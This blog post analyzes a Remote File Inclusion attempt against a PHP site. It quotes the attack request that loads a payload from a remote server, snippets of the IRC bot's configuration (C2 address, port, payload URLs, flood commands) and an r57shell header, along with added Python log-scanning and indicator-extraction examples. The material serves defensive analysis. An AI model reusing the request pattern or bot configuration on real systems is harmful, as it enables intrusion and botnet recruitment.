Another Remote File Inclusion attempt

From today's log:

/wpress/index2.php?mosConfig_absolute_path=http://[IP withheld]/.tmp/site/id3.txt??

The file(s) still exist on that server, so I have withheld the IP.
The following files are somehow being used in the attack:

  • id3.txt
  • scan3.txt
  • cmd.txt
  • spread.txt

The file id3.txt apparently tries to download the file scan3.txt from the same IP.
As my knowledge of perl and other scripting/programming languages is very close to zero, I have no exact knowledge of what is going on. But I can guess.
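The log line at the top is the whole story of the entry point: a query parameter that a PHP script is expected to use as a local include path is instead handed a URL on a remote server, with a trailing "?" so that whatever file name the script appends becomes part of the query string rather than the path. The following is an added example, not code from the post, that scans Apache combined-format access logs for that pattern. The log lines, source addresses and the remote host 198.51.100.7 are constructed; only the request path and the mosConfig_absolute_path parameter are taken from the post.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache combined-log format. The source IPs and the
# remote host are documentation addresses, not the post's withheld one.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2008:10:01:02 +0000] "GET /wpress/index2.php?mosConfig_absolute_path=http://198.51.100.7/.tmp/site/id3.txt?? HTTP/1.1" 200 512 "-" "-"
203.0.113.9 - - [12/Mar/2008:10:01:05 +0000] "GET /wpress/?p=280 HTTP/1.1" 200 8311 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Mar/2008:10:01:07 +0000] "GET /index.php?page=ftp://198.51.100.7/shell.txt%00 HTTP/1.1" 404 221 "-" "-"
203.0.113.12 - - [12/Mar/2008:10:02:00 +0000] "GET /wpress/?s=http://example.org/ HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Parameter names that PHP applications of that era commonly passed straight
# into include()/require(). Only mosConfig_absolute_path comes from the post;
# the rest are assumed additions to the watchlist.
INCLUDE_PARAMS = {
    'mosconfig_absolute_path', 'absolute_path', 'page', 'file', 'path',
    'include', 'inc', 'dir', 'template', 'lang', 'config',
}


def find_rfi_attempts(log_text):
    """Return one finding per query parameter whose value is a remote URL."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group('target')).query
        # parse_qsl percent-decodes, so an encoded %00 shows up as a real null byte.
        for param, value in parse_qsl(query, keep_blank_values=True):
            if not REMOTE_RE.match(value):
                continue
            reasons = ['remote URL in query parameter']
            if param.lower() in INCLUDE_PARAMS:
                reasons.append('parameter name is a known include path')
            if value.endswith('?'):
                reasons.append("trailing '?' turns an appended file name into a query string")
            if '\x00' in value:
                reasons.append('null byte truncates an appended suffix')
            findings.append({
                'src': m.group('src'),
                'ts': m.group('ts'),
                'status': int(m.group('status')),
                'param': param,
                'remote_url': value.rstrip('?').replace('\x00', ''),
                'remote_host': urlsplit(value).hostname,
                # A bare URL in an unrelated parameter (a search box, say) is
                # only a weak signal; anything with a second reason is strong.
                'confidence': 'high' if len(reasons) > 1 else 'low',
                'reasons': reasons,
            })
    return findings


def remote_hosts(findings):
    """Hosts that served payloads in high-confidence attempts, for blocking or follow-up."""
    return sorted({f['remote_host'] for f in findings if f['confidence'] == 'high'})


if __name__ == '__main__':
    for f in find_rfi_attempts(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} {f['confidence']:4} {f['param']} -> {f['remote_url']}")
        for r in f['reasons']:
            print('    ', r)
    print('payload hosts:', remote_hosts(find_rfi_attempts(SAMPLE_LOG)))
```

A 200 status on such a request says nothing about whether the include actually ran; that depends on the PHP build and on allow_url_fopen / allow_url_include (and, for the mosConfig_absolute_path variant, register_globals). The useful follow-up on a hit is to check those settings and look in the web server's outbound connections and temp directories for the fetched files, which is exactly what the rest of this post does.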

scan3.txt

Some stuff from that file:
# % P1tbull Pwned your BoX %
Sounds scary.
But there is more:

# Hacke Bot Version 5.0 Private FiNAL
#
#You can use the following commands :
#!biatch @portscan
#!biatch @nmap
#!biatch @back #!biatch @udpflood

Sounds even more scary.
It is a big file and most of it does not tell me anything, but I mention some snippets:


######################
use HTTP::Request;
use LWP::UserAgent;
######################
my $processo = '/usr/sbin/httpd';
######################
#####################################################################
#/!\ .:CONFIGURATION:. /!\#
#####################################################################
############################################
my $linas_max='10';
my $sleep='3';
#-----------------
#Sleep Time and Max. Lines for Anti Flood #
############################################
my $cmd="http://[IP of the same server the other files are on]/.tmp/site/cmd.txt?";
my $id="http://[IP of the same server the other files are on]/.tmp/site/id3.txt?";
my $spread="http://[IP of the same server the other files are on]/.tmp/site/spread.txt?";
#-----------------
#Spreader, ID=Response, CMD = Print CMD #
############################################
my @adms=("Fr0zen");
#----------------- #
#Admins of the Bot set your nickname here #
############################################
my @canais=("#r00ting");
#----------------- #
#Put your channel here #
############################################
my @nickname = ("r00t|1");
my $nick = $nickname[rand scalar @nickname];
my $ircname ='r00t-rfi';
chop (my $realname = 'we r0x');
#----------------- #
#Identity #
############################################
$servidor='67.43.131.27' unless $servidor;
my $porta='65500';
#----------------- #
#IRCServer and port #
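The configuration block above contains everything a defender needs to block and hunt for this bot: the server hosting the three payload files, the IRC server and port, the channel and the nicknames. The following is an added example, not code from the post or from the bot, that pulls those values out of such a Perl configuration block and turns them into a flat indicator list. The embedded block is a constructed copy of the one above, with 192.0.2.10 standing in for the IP the post withholds; 67.43.131.27, port 65500, the channel and the nicknames are the values the post quotes.

```python
import re
from urllib.parse import urlsplit

# Constructed stand-in for the captured configuration block. 192.0.2.10 replaces
# the withheld payload host; the IRC values are the ones quoted in the post.
BOT_CONFIG = r'''
my $processo = '/usr/sbin/httpd';
my $linas_max='10';
my $sleep='3';
my $cmd="http://192.0.2.10/.tmp/site/cmd.txt?";
my $id="http://192.0.2.10/.tmp/site/id3.txt?";
my $spread="http://192.0.2.10/.tmp/site/spread.txt?";
my @adms=("Fr0zen");
my @canais=("#r00ting");
my @nickname = ("r00t|1");
my $nick = $nickname[rand scalar @nickname];
my $ircname ='r00t-rfi';
chop (my $realname = 'we r0x');
$servidor='67.43.131.27' unless $servidor;
my $porta='65500';
'''

# `my $name = 'value'` or `$name = "value" unless ...`; only quoted literals matter here.
SCALAR_RE = re.compile(r"""^\s*(?:my\s+)?\$(\w+)\s*=\s*(['"])(.*?)\2""")
# `my @name = ("a", "b")`
ARRAY_RE = re.compile(r"""^\s*(?:my\s+)?@(\w+)\s*=\s*\((.*)\)""")
QUOTED_RE = re.compile(r"""(['"])(.*?)\1""")


def parse_bot_config(text):
    """Collect quoted scalar and list assignments from a Perl config block."""
    scalars, arrays = {}, {}
    for line in text.splitlines():
        m = SCALAR_RE.match(line)
        if m:
            scalars[m.group(1)] = m.group(3)
            continue
        m = ARRAY_RE.match(line)
        if m:
            arrays[m.group(1)] = [q[1] for q in QUOTED_RE.findall(m.group(2))]
    return scalars, arrays


def extract_iocs(text):
    """Map the bot's variable names (Portuguese in this family) onto indicator fields."""
    scalars, arrays = parse_bot_config(text)
    urls = [v for v in scalars.values() if re.match(r'https?://', v)]
    port = scalars.get('porta', '')
    return {
        'download_urls': [u.rstrip('?') for u in urls],
        'download_hosts': sorted({urlsplit(u).hostname for u in urls}),
        'irc_server': scalars.get('servidor'),
        'irc_port': int(port) if port.isdigit() else None,
        'channels': arrays.get('canais', []),
        'admin_nicks': arrays.get('adms', []),
        'bot_nicks': arrays.get('nickname', []),
        # Assumed meaning: bots of this kind usually set $0 to this string so the
        # Perl process looks like the web server in `ps`; the post shows only
        # the assignment, so treat it as a hunting cue, not a certainty.
        'process_mask': scalars.get('processo'),
    }


def indicator_lines(iocs):
    """Flat list suitable for a blocklist or a watchlist, one indicator per line."""
    lines = [f'host {h}' for h in iocs['download_hosts']]
    if iocs['irc_server']:
        lines.append(f"host {iocs['irc_server']}")
        if iocs['irc_port']:
            lines.append(f"tcp {iocs['irc_server']}:{iocs['irc_port']}")
    lines += [f'url {u}' for u in iocs['download_urls']]
    return lines


if __name__ == '__main__':
    iocs = extract_iocs(BOT_CONFIG)
    for key, value in iocs.items():
        print(f'{key:15} {value}')
    print('\n'.join(indicator_lines(iocs)))
```

The outbound side is the part a web host can act on immediately: an Apache worker has no business opening a TCP connection to port 65500 anywhere, so an egress rule or a netstat check for connections to the IRC server from the web server's user catches the bot even when the AV engines in the next section miss the files.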

And I keep guessing.
It tries to do something with files called “spread.txt” and “cmd.txt”.
And maybe it tries to connect to an IRC server on 67.43.131.27 too.
Wonder if that is what they call a Command and Control Center?
There is something alive there:

irc.Canada.B0tN3t.org :You have not registered

And then I get “(Ping timeout)”.
B0tN3t.org is registered to a Turkish guy “Ahmet Kafali”.

The file is too big to include here.
But it contains nasty words like “UDPFlood, HTTPFlood, TCPFlood, Mass Deface” to mention some.
Seems to contain a Mailer, Portscanner, LogCleaner and a search function to connect to major search engines to scan for vulnerable domains.
In addition it contains a link to a file on the Albanian Security Clan’s server.

spread.txt

Some kind of configuration file, I guess.
The same IP is mentioned as in “scan3.txt”, 67.43.131.27.
Contains some base64 decoded stuff.
Again, since my knowledge is close to zero, I am only guessing that this file takes care of the connection to the IRC server.

cmd.txt

I have seen that file before. On the Albanian Security Clan's server. A PHP shell or something like that, maybe “r57shell.php”.

/* r57shell.php - ?????? ?? ??? ??????????? ??? ????????? ????????? ??????? ?? ??????? ????? ???????
/* ?? ?????? ??????? ????? ?????? ?? ????? ?????: http://rst.void.ru
/* ??????: 1.31
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/* ????????? ????????????? ?? ?????? ? ????: blf, phoenix, virus, NorD ? ???? ?????? ?? RST/GHC.
/* ???? ? ??? ???? ?????-???? ???? ?? ?????? ???? ????? ??????? ??????? ???????? ? ?????? ?? ??????
/* ?? rst@void.ru. ??? ??????????? ????? ???????????.
/*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
/* (c)oded by 1dt.w0lf
/* RST/GHC http://rst.void.ru , http://ghc.ru
/* ANY MODIFIED REPUBLISHING IS RESTRICTED

I guess that the content of that file will be easy to find if you really want it.

AntiVirus recognition

The “entrance” file id3.txt was only recognized by Authentium who calls it PHP/Small.B and ClamAV who calls it PHP.Downloader. Only a score of 2/32 on VirusTotal.com.

scan3.txt got a score of 7/31 on VirusTotal.com.
ClamAV recognizes it as Trojan.IRCBot-1142

The file spread.txt was not recognized by any vendors.

A bit better regarding the file cmd.txt which got a score of 11/32.
ClamAV calls this one PHP.Shell

I found one little piece of code in one of the files:
echo "AnakDompu";

Which apparently leads to some Indonesian guys.
So I am a bit in doubt about who these guys are; Albanians, Russians, Turks or Indonesians?
AnakDompu gives some hits to pages apparently related to hacking, e.g. http://shinchi.wordpress.com/ , http://samada.wordpress.com/ , http://anakdompu.blogspot.com/ and http://anakdompu.wordpress.com/. And IRC channels on IndoIRC and DALnet.
l33t scriptkiddies who ruin other sites for fun? I think those days are over and most attacks nowadays are economically motivated.

It’s a dangerous world.


source : http://matchent.com/wpress/?p=280